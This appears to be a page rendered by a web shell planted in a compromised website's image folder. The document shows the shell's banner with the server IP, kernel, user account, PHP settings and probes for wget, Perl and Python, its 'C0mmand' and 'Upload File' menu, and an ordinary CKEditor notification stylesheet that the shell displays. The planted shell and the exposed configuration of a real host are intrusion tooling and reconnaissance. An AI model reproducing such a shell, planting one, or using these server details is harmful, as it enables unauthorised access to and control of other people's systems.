|
Server IP : 124.109.2.77 / Your IP : 216.73.216.46 Web Server : Apache/2 System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : cpctlp ( 1020) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341 OFF Directory (0755) : /home/cpctlp/domains/cpctlphp.com/public_html/ckeditor4.10.1/skins/moono-lisa/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
/*
Copyright (c) 2003-2018, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license
*/
/**
* Progress notification structure:
*
* +---div.cke_notification cke_notification_info--------------------------+
* | |
* | +---div.cke_notification_progress-----------------------------------+ |
* | | | |
* | +-------------------------------------------------------------------+ |
* | |
* | +---p.cke_notification_message--------------------------------------+ |
* | | Foo | |
* | +-------------------------------------------------------------------+ |
* | |
* | +---a.cke_notification_close----------------------------------------+ |
* | | +---span.cke_label----------------------------------------------+ | |
* | | | X | | |
* | | +---------------------------------------------------------------+ | |
* | +-------------------------------------------------------------------+ |
* | |
* +-----------------------------------------------------------------------+
*
*
* Warning notification structure:
*
* +---div.cke_notification cke_notification_warning-----------------------+
* | |
* | +---p.cke_notification_message--------------------------------------+ |
* | | Foo | |
* | +-------------------------------------------------------------------+ |
* | |
* | +---a.cke_notification_close----------------------------------------+ |
* | | +---span.cke_label----------------------------------------------+ | |
* | | | X | | |
* | | +---------------------------------------------------------------+ | |
* | +-------------------------------------------------------------------+ |
* | |
* +-----------------------------------------------------------------------+
*
* Success and info notifications have the same structure as warning, but use
* `cke_notification_success` and `cke_notification_info` instead of `cke_notification_warning`.
*/
.cke_notifications_area
{
/* Prevent notification margin capture clicking. */
pointer-events: none;
}
.cke_notification
{
pointer-events: auto;
position: relative;
margin: 10px;
width: 300px;
color: white;
text-align: center;
opacity: 0.95;
filter: alpha(opacity = 95);
-webkit-animation: fadeIn 0.7s;
animation: fadeIn 0.7s;
}
.cke_notification_message a
{
color: #12306F;
}
@-webkit-keyframes fadeIn
{
from { opacity: 0.4; }
to { opacity: 0.95; }
}
@keyframes fadeIn
{
from { opacity: 0.4; }
to { opacity: 0.95; }
}
.cke_notification_success
{
background: #72B572;
border: 1px solid #63A563;
}
.cke_notification_warning
{
background: #C83939;
border: 1px solid #902B2B;
}
.cke_notification_info
{
background: #2E9AD0;
border: 1px solid #0F74A8;
}
.cke_notification_info span.cke_notification_progress
{
background-color: #0F74A8;
display: block;
padding: 0;
margin: 0;
height: 100%;
overflow: hidden;
position: absolute;
z-index: 1;
}
.cke_notification_message
{
position: relative;
margin: 4px 23px 3px;
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
line-height: 18px;
z-index: 4;
text-overflow: ellipsis;
overflow: hidden;
}
.cke_notification_close
{
background-image: url(images/close.png);
background-repeat: no-repeat;
background-position: 50%;
position: absolute;
cursor: pointer;
text-align: center;
height: 20px;
width: 20px;
top: 1px;
right: 1px;
padding: 0;
margin: 0;
z-index: 5;
opacity: 0.6;
filter: alpha(opacity = 60);
}
.cke_notification_close:hover
{
opacity: 1;
filter: alpha(opacity = 100);
}
.cke_notification_close span
{
display: none;
}
.cke_notification_warning a.cke_notification_close
{
opacity: 0.8;
filter: alpha(opacity = 80);
}
.cke_notification_warning a.cke_notification_close:hover
{
opacity: 1;
filter: alpha(opacity = 100);
}